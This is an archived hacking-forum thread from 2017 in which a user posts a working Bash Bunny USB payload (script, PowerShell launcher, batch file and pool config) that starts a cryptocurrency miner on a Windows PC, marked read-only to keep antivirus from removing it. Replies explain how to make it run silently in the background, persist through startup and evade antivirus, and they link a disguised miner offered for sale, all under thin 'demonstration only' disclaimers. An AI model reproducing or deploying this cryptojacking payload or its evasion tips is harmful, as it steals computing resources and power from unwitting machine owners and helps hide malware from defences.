InfoSecREDD Posted October 4, 2017 Share Posted October 4, 2017 BunnyMiner By Ar1k88 I'm going to "quietly" sneak this onto the thread... **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PC'S! MYSELF, & MINERGATE DO NOT ENCOURAGE SUCH USE! **** Anyways, this is just a Simple CPU Miner from my Collection of Odd Scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner, yes it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :) payload.txt #!/bin/bash # # Title: USB CPU Miner # Author: Ar1k88 # Version: 1.1g # Target: Windows 7-10 # Category: Exploiting Resources # Sub-Category: Cryptocurrency # # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB. # # Please change the credentials in "config.txt" to this format: # <algorithim> # <pool stratum> # <username/wallet> # <cores/threads> # # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip # Extract the EXE's and use the x86 (32Bit) version due to it supports both 32Bit and 64Bit CPU # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe". # Enjoy! -Ar1k88 # Grace-period for PC to recognize the BashBunny. Q DELAY 300 # Setting up and Attacking! CHARRRRGGGEEE!!! LED ATTACK # NOTE: Setting to Read-Only Storage to prevent Anti-virus's from removing binary files. (EXE's) ATTACKMODE HID RO_STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')" LED FINISH 1.cmd @echo Off cls REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is. REM -Ar1k88 SetLocal EnableDelayedExpansion Set n= Set ConfigFile=%~dp0\config.txt For /F "tokens=*" %%I IN (%ConfigFile%) DO ( Set /a n+=1 Set var!n!=%%I ) echo %var3% call %~dp0\2.exe -a %var1% -o %var2% -u %var3% -p x -t %var4% pause EndLocal @exit /B Config.txt is set up as following: <algorithm> <stratum> <email/wallet> <threads/cores> config.txt cryptonight stratum+tcp://aeon.pool.minergate.com:45550 demoemailaddress@email.com 2 Enjoy! P.S. - If you want to sign up to show this off to your friends or for work. Can easily create a account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88 Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted October 4, 2017 Share Posted October 4, 2017 Nice. So if we did make this silent we could plug it into a PC, let it do it's thing and unplug it then it will still mine in the background without the user knowing? (I mean, they will probably notice a performance change and a slight increase in power consumption..) Could maybe be useful if you want to add a bit of money to your wallet using lots of PCs..Maybe. Haha. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted October 4, 2017 Author Share Posted October 4, 2017 1 minute ago, Dave-ee Jones said: Nice. So if we did make this silent we could plug it into a PC, let it do it's thing and unplug it then it will still mine in the background without the user knowing? (I mean, they will probably notice a performance change and a slight increase in power consumption..) Could maybe be useful if you want to add a bit of money to your wallet using lots of PCs..Maybe. Haha. Hahaha I'm not gonna answer that question due to its "nature".. and the fact I work for a Cryptocurrency Pool.. ;) Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted October 4, 2017 Share Posted October 4, 2017 2 minutes ago, Ar1k88 said: Hahaha I'm not gonna answer that question due to its "nature".. and the fact I work for a Cryptocurrency Pool.. ;) Then I'm going to assume yes (Not that I would actually do that, btw). Fair enough though. EDIT: 700th post. Heh. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted October 4, 2017 Author Share Posted October 4, 2017 "it should".. Due to it's already loaded in memory after it starts. Link to comment Share on other sites More sharing options...
xLEEJOHNx Posted October 4, 2017 Share Posted October 4, 2017 This should be made into a silent mode!!!!!!!!! Link to comment Share on other sites More sharing options...
InfoSecREDD Posted October 4, 2017 Author Share Posted October 4, 2017 3 hours ago, xLEEJOHNx said: This should be made into a silent mode!!!!!!!!! No this is for demonstration purposes only. Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted October 4, 2017 Share Posted October 4, 2017 Wow thats a nice idea :) Thanks for sharing. I might convert this script to a USB Rubber Ducky (since its not that hard) Link to comment Share on other sites More sharing options...
InfoSecREDD Posted October 4, 2017 Author Share Posted October 4, 2017 4 hours ago, xLEEJOHNx said: This should be made into a silent mode!!!!!!!!! Also I have a Persistent and Silent Miner script, but the public doesn't get to have that. If you want to make it Silent, be my guest. Since this is only "part" of the original code, I took out the silent and persistent options for demonstration purposes. Link to comment Share on other sites More sharing options...
stekole Posted October 5, 2017 Share Posted October 5, 2017 haha i just started dev on something similar! awesome job Link to comment Share on other sites More sharing options...
stekole Posted October 5, 2017 Share Posted October 5, 2017 actually mine is for mac, still great job! I will take a look Link to comment Share on other sites More sharing options...
InfoSecREDD Posted October 5, 2017 Author Share Posted October 5, 2017 3 hours ago, stekole said: haha i just started dev on something similar! awesome job Let me know how it goes! I'm actually trying to code a Miner I made for Windows for my work (MinerGate). I kinda need to see how Mac's script since I don't have a MacOS to code on, so I can try and convert it to Mac.. :) Link to comment Share on other sites More sharing options...
RazerBlade Posted October 5, 2017 Share Posted October 5, 2017 Please use POSIX compatible calls so it will work on any unix system! Link to comment Share on other sites More sharing options...
InfoSecREDD Posted October 5, 2017 Author Share Posted October 5, 2017 56 minutes ago, RazerBlade said: Please use POSIX compatible calls so it will work on any unix system! Nah I can create a separate function for *nix based systems, but it would probably end up pulling dependencies, and pulling from GitHub, then compiling.. so would take about 5 mins to do all that via BashBunny.. Idk my opinion kinda defeats the purpose, but it can be done.. :) Link to comment Share on other sites More sharing options...
icarus255 Posted November 22, 2017 Share Posted November 22, 2017 Firstly, just wanted to say thanks. I've been looking for something like this - love your work. I still have much to learn about the Bash Bunny and IT security in general but love these forums. I will share what I can. On 10/4/2017 at 9:21 AM, Ar1k88 said: "it should".. Due to it's already loaded in memory after it starts. Yes, I can confirm that if you unplug the BB from USB the cpuminer keeps running in the background/memory. I know this is probably going against your wishes but I was pretty excited when I figured this out on my owns so thought I would share my findings with those who asked. I looked up the usage of the cpuminer and by appending "--help" I got a list of all the additional command line arguments. By appending -B you can set the miner to run in the background so all you have to do is edit the startup script i.e. 1.cmd And I'm sure making it persistent will not be too hard once I get more familiar with power shell and BB. The hardest part is getting past the AV products as all these miners are now added to the definitions regardless of whether you use them for legitimate purposes or not. Windows Defender didn't block the software... Link to comment Share on other sites More sharing options...
InfoSecREDD Posted November 22, 2017 Author Share Posted November 22, 2017 3 hours ago, icarus255 said: Firstly, just wanted to say thanks. I've been looking for something like this - love your work. I still have much to learn about the Bash Bunny and IT security in general but love these forums. I will share what I can. Yes, I can confirm that if you unplug the BB from USB the cpuminer keeps running in the background/memory. I know this is probably going against your wishes but I was pretty excited when I figured this out on my owns so thought I would share my findings with those who asked. I looked up the usage of the cpuminer and by appending "--help" I got a list of all the additional command line arguments. By appending -B you can set the miner to run in the background so all you have to do is edit the startup script i.e. 1.cmd And I'm sure making it persistent will not be too hard once I get more familiar with power shell and BB. The hardest part is getting past the AV products as all these miners are now added to the definitions regardless of whether you use them for legitimate purposes or not. Windows Defender didn't block the software... Yeah, I have another script that installs a masked version of a Base64 EXE that runs to a proxy, that way you can move miners without having to reprogram the script.. But I'm a veteran Bitcoin/Altcoin Miner, plus was Staff for MinerGate.. so I personally can't recommend using this on PC's other then your own.. If you want more info, just message me. -Ar1k88 Https://twitter.com/ar1k88 Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted November 23, 2017 Share Posted November 23, 2017 9 hours ago, Ar1k88 said: Yeah, I have another script that installs a masked version of a Base64 EXE that runs to a proxy, that way you can move miners without having to reprogram the script.. But I'm a veteran Bitcoin/Altcoin Miner, plus was Staff for MinerGate.. so I personally can't recommend using this on PC's other then your own.. If you want more info, just message me. -Ar1k88 Https://twitter.com/ar1k88 "Plus was staff for MinerGate". So you're saying you businessically couldn't recommend using this is a PC other than one you own, but now you can't personally? :P Link to comment Share on other sites More sharing options...
InfoSecREDD Posted November 23, 2017 Author Share Posted November 23, 2017 16 hours ago, icarus255 said: Firstly, just wanted to say thanks. I've been looking for something like this - love your work. I still have much to learn about the Bash Bunny and IT security in general but love these forums. I will share what I can. Yes, I can confirm that if you unplug the BB from USB the cpuminer keeps running in the background/memory. I know this is probably going against your wishes but I was pretty excited when I figured this out on my owns so thought I would share my findings with those who asked. I looked up the usage of the cpuminer and by appending "--help" I got a list of all the additional command line arguments. By appending -B you can set the miner to run in the background so all you have to do is edit the startup script i.e. 1.cmd And I'm sure making it persistent will not be too hard once I get more familiar with power shell and BB. The hardest part is getting past the AV products as all these miners are now added to the definitions regardless of whether you use them for legitimate purposes or not. Windows Defender didn't block the software... There's also custom remade Single File Miners like: https://satoshibox.com/r6jmnqvbg6d53vrib33eounx That allow you to pretty much go unseen aslong as the user doesn't notice the incredible 100% CPU usage. (Can be toned down with scripts) 3 hours ago, Dave-ee Jones said: "Plus was staff for MinerGate". So you're saying you businessically couldn't recommend using this is a PC other than one you own, but now you can't personally? :P Link to comment Share on other sites More sharing options...
Clean_Focus Posted December 2, 2017 Share Posted December 2, 2017 Awesome script! I made some modifications so it runs silently in the background, it's actually pretty neat even after removing the BB the script will continue to run until the computer is reset or the process is killed....to keep it going you can just have BB copy it to a directory on the machine w/ a batch file to execute and create a startup process to execute...... as I am "typing out loud" lol. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted December 2, 2017 Author Share Posted December 2, 2017 3 hours ago, Clean_Focus said: Awesome script! I made some modifications so it runs silently in the background, it's actually pretty neat even after removing the BB the script will continue to run until the computer is reset or the process is killed....to keep it going you can just have BB copy it to a directory on the machine w/ a batch file to execute and create a startup process to execute...... as I am "typing out loud" lol. Yep, only issue with making a batch/cmd file to start on "startup" - Sometimes it will require a prompt to allow the script.. I use a Custom Miner that bypasses 99% of AV's... The one linked above.. bypasses about 60% of AV's.. I'm not sure if I should release the one that bypasses everything, due to it's not even a known exploit yet.. Link to comment Share on other sites More sharing options...
RazerBlade Posted December 2, 2017 Share Posted December 2, 2017 1 hour ago, Ar1k88 said: Yep, only issue with making a batch/cmd file to start on "startup" - Sometimes it will require a prompt to allow the script.. I use a Custom Miner that bypasses 99% of AV's... The one linked above.. bypasses about 60% of AV's.. I'm not sure if I should release the one that bypasses everything, due to it's not even a known exploit yet.. You can send me a dm with it. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted December 2, 2017 Author Share Posted December 2, 2017 17 minutes ago, RazerBlade said: You can send me a dm with it. I will just tell you it's similar set up to the last link at SatoshiBox I posted in here.. but it's Disguised as different process that for some reason AV's allow it to run and use 99% of Resources without getting flagged.. Pretty much due to how a PC allows Gaming.. ? Link to comment Share on other sites More sharing options...
Clean_Focus Posted December 2, 2017 Share Posted December 2, 2017 27 minutes ago, Ar1k88 said: I will just tell you it's similar set up to the last link at SatoshiBox I posted in here.. but it's Disguised as different process that for some reason AV's allow it to run and use 99% of Resources without getting flagged.. Pretty much due to how a PC allows Gaming.. ? Well now you have me interested, I just got my BB. Modifying your script was my first little project. Would love to see your miner, I could learn a lot...I got a grasp on the foundation of the BB and most of the exploit frameworks, PS/VBS coding last night, but I'm new to most of this typically just do web/network development so I'm sure I made a lot of rookie mistakes. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted December 2, 2017 Author Share Posted December 2, 2017 11 minutes ago, Clean_Focus said: Well now you have me interested, I just got my BB. Modifying your script was my first little project. Would love to see your miner, I could learn a lot...I got a grasp on the foundation of the BB and most of the exploit frameworks, PS/VBS coding last night, but I'm new to most of this typically just do web/network development so I'm sure I made a lot of rookie mistakes. You flatter me, I dont know "Everything"... I think the link to the miner I posted earlier is.. http://bit.ly/CustomXMRig4Sale I dont recommend buying it... But recommend just learning how to do that stuff yourself.. That is pretty much for the "Lazy Scripters"... The one I have that bypasses 90% of AV's, I am not releasing it due to the fact it can be easily exploited.. Has nothing to do with a hard exploit or anything... It's just using features of Windows and Anti-Viruses against itself.. The link above gets I think a 7/35 on NoDistrubute.com which is a online "No-Report" Virus Scanner... Where XMRig is flagged 18/35 the last time I checked.. Where the other one also gets flagged by 7/35... But the other remaining Anti-Viruses have now got a feature to detect over usage of PC Resources... Therefore if ran for a long time, It will get flagged eventually then reported to the remaining Anti-virus Companies.. (How it works now days sadly) Like I said before I dont recommend buying a premade disguised miner, rather than make it yourself... But if you're lazy and want it... It's there.. :) Link to comment Share on other sites More sharing options...
Clean_Focus Posted December 3, 2017 Share Posted December 3, 2017 4 hours ago, Ar1k88 said: You flatter me, I dont know "Everything"... I think the link to the miner I posted earlier is.. http://bit.ly/CustomXMRig4Sale I dont recommend buying it... But recommend just learning how to do that stuff yourself.. That is pretty much for the "Lazy Scripters"... The one I have that bypasses 90% of AV's, I am not releasing it due to the fact it can be easily exploited.. Has nothing to do with a hard exploit or anything... It's just using features of Windows and Anti-Viruses against itself.. The link above gets I think a 7/35 on NoDistrubute.com which is a online "No-Report" Virus Scanner... Where XMRig is flagged 18/35 the last time I checked.. Where the other one also gets flagged by 7/35... But the other remaining Anti-Viruses have now got a feature to detect over usage of PC Resources... Therefore if ran for a long time, It will get flagged eventually then reported to the remaining Anti-virus Companies.. (How it works now days sadly) Like I said before I dont recommend buying a premade disguised miner, rather than make it yourself... But if you're lazy and want it... It's there.. :) No point in buying lol, I'm not in the process of starting a malware mining empire...ill look into making one as a weekend project. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.